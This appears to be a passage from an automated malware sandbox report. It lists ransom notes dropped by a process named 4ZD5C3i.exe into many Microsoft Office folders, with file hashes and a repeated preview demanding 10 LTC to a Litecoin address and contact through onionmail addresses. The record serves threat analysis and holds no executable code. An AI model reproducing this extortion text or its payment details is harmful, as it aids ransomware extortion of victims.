                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\THEMES16\EXPEDITN\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\THEMES16\ICE\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\THEMES16\INDUST\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\THEMES16\IRIS\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\THEMES16\JOURNAL\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\THEMES16\LAYERS\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\THEMES16\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\TRANSLAT\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\VBA\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Web Server Extensions\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\ODBC\Data Sources\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\System\MSMAPI\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\System\ole db\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft SQL Server\130\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
